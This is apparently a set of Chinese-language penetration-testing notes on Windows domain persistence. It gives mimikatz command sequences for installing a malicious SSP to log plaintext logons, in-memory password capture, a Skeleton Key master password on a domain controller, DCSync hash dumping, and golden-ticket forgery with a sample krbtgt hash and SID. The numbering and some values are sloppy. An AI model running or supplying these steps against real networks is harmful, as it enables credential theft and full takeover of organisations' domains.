一、ssp密碼記錄
ssp(security Support Provider),一個用於身份驗證的 dll,系統在啟動時 SSP 會被加載到 lsass.exe 進程中,由於 lsa 可擴展,導致在系統啟動時我們可以加載一個自定義的 dll,一個用於記錄所有登錄到當 前系統的明文賬號密碼的 dll, 利用mimikatz 中mimilib.dll 文件。
把 mimikatz 中的 mimilib.dll 傳到目標域控的 c:\windows\system32\目錄下
copy mimilib.dll %systemroot%\system32
reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
重啟成功,如果有用戶成功登錄到當前系統中,會在 c:\windows\system32 目錄下生成一個用於記錄登賬賬號密碼的 kiwissp.log 文件
(2)利用方式二 ,利用進程注入,無需重啟立即開啟密碼記錄,重啟則計算機失效
mimikatz privilege::debug
mimikatz misc::memssp
type C:\Windows\System32\mimilsa.log
二、Skeleton Key
Skeleton Key被安裝在64位的域控服務器上,支持Windows Server2003—Windows Server2012 R2,能夠讓所有域用戶使用同一個萬能密碼進行登錄,現有的所有域用戶使用原密碼仍能繼續登錄,注意並不能更改用戶權限,重啟后失效。
mimikaz執行命令:privilege::debug、misc::skeleton
mimikatz的默認Skeleton Key設置為mimikatz(坑點:使用主機名鏈接)
net use \\WIN-6HQC11EJBDP.yiwang.com\c$ /user:"yiwang\administrator" "mimikatz"
二.Hook PasswordChangeNotify
Hook PasswordChangeNotify 攔截修改的帳戶密碼,當修改域控密碼時,LSA 首先會去調用 PasswordFileter 來判斷新密碼是否符合密碼復雜度要求,如果符合,LSA 則會接着去調用 PasswordChangeNotify 在系統上同步更新密碼,而函數 PasswordChangeNotify 存在於 rassfm.dll,rassfm.dll可理解為Remote Access Subauthentication dll,只存在於在Server系統下,xp、win7、win8等均不存在。
三.黃金票據
域內的一台機器向某一台服務器發起請求,請求首先會發被發送到kdc(域控)主機進行as認證,認證成功回返回tgt給客戶機,然后客戶機會接着拿這個tgt去向kdc中的tgs去請求,最后獲取ticket,TGT是根據指定的 user[域內用戶],domain[域名],timestamp[時間戳],外加一系列權限信息經過 krbtgt 這個域賬戶的 ntlm hash 加密后的結果,所以我們只要獲取到相應的域用戶名,域名,域 SID,以及 krbtgt 賬戶的 ntlm hash 就可以生成"黃金票據",因為可以拿着 krbtgt ntlm hash 或者 aes key 偽造域內任意用戶 TGT,就可以完整訪問域內的任意機器。
域管權限下導出域內所有域用戶的 ntlm hash
mimikatz lsadump::dcsync /domain:yiwang/all /csv
圖.jpg
導出指定域用戶的 ntlm hash 和 aes key,krbtgt
mimikatz lsadump::dcsync /domain:yiwang.com /user:krbtgt
當前域的域名 yiwang.com
當前域的 sid S-1-5-21-1650053798-3901349794-3227671014-500 whoami /user
Krbtgt 的 ntlm hash 或者對應的 aes key 1a22505e768e7c590b3923a4f3a31502
指定域用戶,通常情況下直接寫 administrator 即可 administrator 指定域用戶
rid,一般直接寫 500 即可 50
mimikatz kerberos::golden /admin:administrator /domain:yiwang.com /id:500 /sid:S-1-5-21-1650053798-3901349794-3227671014-500 /krbtgt:1a22505e768e7c590b3923a4f3a31502 /ptt
訪問域控dir \\dc$ (DC主機名)\c$ 一定得主機名